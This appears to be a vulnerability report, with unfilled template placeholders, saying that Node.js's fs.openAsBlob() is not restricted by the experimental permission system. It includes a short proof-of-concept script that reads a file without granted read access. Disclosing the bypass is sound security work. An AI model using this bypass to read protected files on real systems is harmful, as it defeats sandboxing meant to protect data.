Summary: [add summary of the vulnerability]
fs.openAsBlob()
does not appear to be limited by the permission system.
Description: [add more details about this vulnerability]
Starting Node with --experimental-permission
does not appear to restrict fs.openAsBlob()
.
Run the following code with --experimental-permission
and do not grant is read access to file.txt
:
'use strict';
const fs = require('node:fs');
async function main() {
const blob = await fs.openAsBlob(__dirname + '/file.txt');
console.log(await blob.text());
}
main();
The permission system is bypassed when it should not be.
None
An attacker can read files they should not be able to.